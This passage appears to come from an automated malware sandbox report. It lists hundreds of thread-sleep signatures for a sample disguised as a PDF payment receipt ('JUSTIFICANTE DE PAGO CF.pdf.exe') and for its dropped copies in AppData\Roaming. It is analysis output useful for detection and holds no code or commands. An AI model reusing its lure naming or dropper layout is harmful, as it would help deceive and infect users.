                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exe TID: 6696Thread sleep count: 7910 > 30Jump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exe TID: 6696Thread sleep count: 1876 > 30Jump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exe TID: 5572Thread sleep time: -99891s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exe TID: 5572Thread sleep time: -99766s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exe TID: 5572Thread sleep time: -99657s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exe TID: 5572Thread sleep time: -99532s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exe TID: 5572Thread sleep time: -99407s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exe TID: 5572Thread sleep time: -99293s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exe TID: 5572Thread sleep time: -99172s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exe TID: 5572Thread sleep time: -99063s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exe TID: 5572Thread sleep time: -98953s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exe TID: 5572Thread sleep time: -98844s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exe TID: 5572Thread sleep time: -98719s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exe TID: 5572Thread sleep time: -98609s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exe TID: 5572Thread sleep time: -98500s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exe TID: 5572Thread sleep time: -98391s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exe TID: 5572Thread sleep time: -98282s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exe TID: 5572Thread sleep time: -98157s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exe TID: 5572Thread sleep time: -98032s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exe TID: 5572Thread sleep time: -97907s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exe TID: 5572Thread sleep time: -97797s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exe TID: 5572Thread sleep time: -97688s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exe TID: 5572Thread sleep time: -97563s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exe TID: 5572Thread sleep time: -97438s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exe TID: 5572Thread sleep time: -97324s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exe TID: 5572Thread sleep time: -97204s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exe TID: 5572Thread sleep time: -97079s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exe TID: 5572Thread sleep time: -96954s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exe TID: 5572Thread sleep time: -96829s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exe TID: 5572Thread sleep time: -96704s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exe TID: 5572Thread sleep time: -96579s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exe TID: 5572Thread sleep time: -96454s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exe TID: 5572Thread sleep time: -96329s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exe TID: 5572Thread sleep time: -96204s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exe TID: 5572Thread sleep time: -96078s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exe TID: 5572Thread sleep time: -95969s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exe TID: 5572Thread sleep time: -95860s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exe TID: 5572Thread sleep time: -95735s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exe TID: 5572Thread sleep time: -95610s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exe TID: 5572Thread sleep time: -95485s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exe TID: 5572Thread sleep time: -95360s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exe TID: 5572Thread sleep time: -95235s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exe TID: 5572Thread sleep time: -95110s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exe TID: 5572Thread sleep time: -94985s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exe TID: 5572Thread sleep time: -94860s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exe TID: 5572Thread sleep time: -99938s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exe TID: 5572Thread sleep time: -99813s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exe TID: 5572Thread sleep time: -99688s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exe TID: 5572Thread sleep time: -99563s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exe TID: 5572Thread sleep time: -99453s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exe TID: 5572Thread sleep time: -99344s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 1868Thread sleep time: -11068046444225724s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 1868Thread sleep time: -600000s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 1868Thread sleep time: -599890s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 1716Thread sleep count: 565 > 30Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 1716Thread sleep count: 2929 > 30Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 1868Thread sleep time: -599781s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 1868Thread sleep time: -599671s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 1868Thread sleep time: -599562s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 1868Thread sleep time: -599453s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 1868Thread sleep time: -599343s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 1868Thread sleep time: -599234s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 1868Thread sleep time: -599125s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 1868Thread sleep time: -599015s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 1868Thread sleep time: -598906s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 1868Thread sleep time: -598796s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 1868Thread sleep time: -598687s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 1868Thread sleep time: -598578s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 1868Thread sleep time: -598468s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 1868Thread sleep time: -598359s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 1868Thread sleep time: -598247s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 1868Thread sleep time: -598097s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 1868Thread sleep time: -597968s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 1868Thread sleep time: -597856s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 6416Thread sleep time: -922337203685477s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 5684Thread sleep time: -23058430092136925s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 5684Thread sleep time: -100000s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 4368Thread sleep count: 2180 > 30Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 5684Thread sleep time: -99875s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 4368Thread sleep count: 7668 > 30Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 5684Thread sleep time: -99765s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 5684Thread sleep time: -99656s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 5684Thread sleep time: -99547s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 5684Thread sleep time: -99434s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 5684Thread sleep time: -99326s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 5684Thread sleep time: -99203s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 5684Thread sleep time: -99089s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 5684Thread sleep time: -98969s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 5684Thread sleep time: -98844s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 5684Thread sleep time: -98734s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 5684Thread sleep time: -98625s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 5684Thread sleep time: -98515s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 5684Thread sleep time: -98406s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 5684Thread sleep time: -98297s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 5684Thread sleep time: -98187s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 5684Thread sleep time: -98078s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 5684Thread sleep time: -97968s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 5684Thread sleep time: -97843s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 5684Thread sleep time: -97734s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 5684Thread sleep time: -97625s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 5684Thread sleep time: -97515s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 5684Thread sleep time: -97406s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 5684Thread sleep time: -97297s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 5684Thread sleep time: -97187s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 5684Thread sleep time: -97078s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 5684Thread sleep time: -96968s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 5684Thread sleep time: -96859s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 5684Thread sleep time: -96750s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 5684Thread sleep time: -96640s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 5684Thread sleep time: -96531s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 5684Thread sleep time: -96421s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 5684Thread sleep time: -96312s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 5684Thread sleep time: -96203s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 5684Thread sleep time: -99953s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 5684Thread sleep time: -99844s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 5684Thread sleep time: -99719s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 5684Thread sleep time: -99610s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 5684Thread sleep time: -99485s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 5684Thread sleep time: -99344s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 5684Thread sleep time: -99218s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 5684Thread sleep time: -99109s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 5684Thread sleep time: -99000s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 5684Thread sleep time: -98891s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 5684Thread sleep time: -98766s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 5684Thread sleep time: -98656s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 5684Thread sleep time: -98547s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 5684Thread sleep time: -98438s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 5684Thread sleep time: -98313s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe TID: 3652Thread sleep time: -6456360425798339s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe TID: 3652Thread sleep time: -600000s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe TID: 5800Thread sleep count: 370 > 30
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe TID: 3652Thread sleep time: -599874s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe TID: 5800Thread sleep count: 2757 > 30
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe TID: 3652Thread sleep time: -599750s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe TID: 3652Thread sleep time: -599637s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe TID: 3652Thread sleep time: -599516s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe TID: 3652Thread sleep time: -599406s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe TID: 3652Thread sleep time: -599297s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe TID: 3652Thread sleep time: -599188s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe TID: 3652Thread sleep time: -599078s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe TID: 3652Thread sleep time: -598969s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe TID: 3652Thread sleep time: -598844s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe TID: 3652Thread sleep time: -598734s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe TID: 3652Thread sleep time: -598624s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe TID: 3652Thread sleep time: -598515s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe TID: 3652Thread sleep time: -598406s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe TID: 3652Thread sleep time: -598297s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe TID: 3652Thread sleep time: -598187s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe TID: 3652Thread sleep time: -598078s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe TID: 2072Thread sleep time: -30000s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe TID: 1272Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe TID: 4816Thread sleep count: 36 > 30
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe TID: 4816Thread sleep time: -33204139332677172s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe TID: 4816Thread sleep time: -100000s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe TID: 4816Thread sleep time: -99890s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe TID: 3280Thread sleep count: 8062 > 30
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe TID: 4816Thread sleep time: -99781s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe TID: 3280Thread sleep count: 1786 > 30
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe TID: 4816Thread sleep time: -99672s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe TID: 4816Thread sleep time: -99562s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe TID: 4816Thread sleep time: -99453s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe TID: 4816Thread sleep time: -99344s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe TID: 4816Thread sleep time: -99234s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe TID: 4816Thread sleep time: -99124s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe TID: 4816Thread sleep time: -99015s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe TID: 4816Thread sleep time: -98906s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe TID: 4816Thread sleep time: -98797s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe TID: 4816Thread sleep time: -98687s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe TID: 4816Thread sleep time: -98577s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe TID: 4816Thread sleep time: -98469s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe TID: 4816Thread sleep time: -98359s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe TID: 4816Thread sleep time: -98250s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe TID: 4816Thread sleep time: -98140s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe TID: 4816Thread sleep time: -98031s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe TID: 4816Thread sleep time: -97922s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe TID: 4816Thread sleep time: -97812s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe TID: 4816Thread sleep time: -97703s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe TID: 4816Thread sleep time: -97594s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe TID: 4816Thread sleep time: -97484s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe TID: 4816Thread sleep time: -97375s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe TID: 4816Thread sleep time: -99968s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe TID: 4816Thread sleep time: -99859s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe TID: 4816Thread sleep time: -99750s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe TID: 4816Thread sleep time: -99640s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe TID: 4816Thread sleep time: -99531s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe TID: 4816Thread sleep time: -99422s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe TID: 4816Thread sleep time: -99312s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe TID: 4816Thread sleep time: -99203s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe TID: 4816Thread sleep time: -99093s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe TID: 4816Thread sleep time: -98984s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe TID: 4816Thread sleep time: -98874s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe TID: 4816Thread sleep time: -98765s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe TID: 4816Thread sleep time: -98656s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe TID: 4816Thread sleep time: -98502s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe TID: 4816Thread sleep time: -98375s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe TID: 4816Thread sleep time: -98264s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe TID: 4816Thread sleep time: -98041s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe TID: 4816Thread sleep time: -97852s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe TID: 4816Thread sleep time: -96578s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe TID: 4816Thread sleep time: -96422s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe TID: 4816Thread sleep time: -96312s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe TID: 4816Thread sleep time: -96203s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe TID: 4816Thread sleep time: -96092s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe TID: 4816Thread sleep time: -95984s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe TID: 4816Thread sleep time: -95874s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe TID: 4816Thread sleep time: -95765s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 5320Thread sleep time: -8301034833169293s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 5320Thread sleep time: -600000s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 5320Thread sleep time: -599875s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 3712Thread sleep count: 2428 > 30
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 3712Thread sleep count: 562 > 30
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 5320Thread sleep time: -599765s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 5320Thread sleep time: -599653s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 5320Thread sleep time: -599547s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 5320Thread sleep time: -599437s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 5320Thread sleep time: -599328s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 5320Thread sleep time: -599218s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 5320Thread sleep time: -599110s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 5320Thread sleep time: -598985s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 5320Thread sleep time: -598860s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 5320Thread sleep time: -598735s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 5320Thread sleep time: -598610s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 5320Thread sleep time: -598485s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 5320Thread sleep time: -598360s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 5320Thread sleep time: -598219s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 5320Thread sleep time: -598109s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 5320Thread sleep time: -598000s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 5900Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 3624Thread sleep count: 43 > 30
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 3624Thread sleep time: -39660499758475511s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 3624Thread sleep time: -200000s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 4788Thread sleep count: 1977 > 30
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 3624Thread sleep time: -99874s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 4788Thread sleep count: 7826 > 30
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 3624Thread sleep time: -99763s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 3624Thread sleep time: -99655s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 3624Thread sleep time: -99545s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 3624Thread sleep time: -99437s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 3624Thread sleep time: -99327s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 3624Thread sleep time: -99218s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 3624Thread sleep time: -99108s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 3624Thread sleep time: -98999s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 3624Thread sleep time: -98889s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 3624Thread sleep time: -98780s >= -30000s
